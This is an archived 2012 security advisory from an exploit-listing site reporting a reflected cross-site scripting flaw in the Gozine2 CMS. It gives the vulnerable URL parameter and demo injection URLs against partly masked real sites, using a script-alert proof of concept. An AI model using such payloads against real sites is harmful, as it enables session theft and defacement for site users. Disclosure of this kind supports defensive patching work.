Gazine2 Cross Site Scripting

2012.09.22
Credit: Net.W0lf
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################ ---------------------------------------------------------------- Gozine2 <= Cross Site Scripting Vulnerabilities ---------------------------------------------------------------- ################################################################ # Exploit Title : Gozine2 <= Cross Site Scripting VulnerabilitieS # Author : Hack Center Security Team # Discovered By : Net.W0lf # Software Link : [ www.gozine2.ir ] # Impact : [ High ] # My site : Net-W0lf.blogspot.com # E-Mail : Bl4ck.Intell@gmail.com & Net-W0lf@att.net #### ---------------------------------------------------------------- +-----------------------+ | Cross Site scripting | +-----------------------+ 3xpl0!T : [TaRgeT]/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=[xss] Dem0: www.gXXXXXXXine2.ir/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script> www.XXXXXXXXXXXXavan.ir/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script> www.gXXoXXXX.co/modules.php?name=Result_Cards&op=ResultCards&Field_ID=&Year=<script>alert(/0/)</script> GreetZ To : | Am!r | B3HZ4D | PacketStormSecurity.org | Exploit-db.Com | | And All Iranian Black Hat HackerZ | Persian Gulf 4 Ever ===========================================# End #=============================================

References:

http://www.gozine2.ir


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top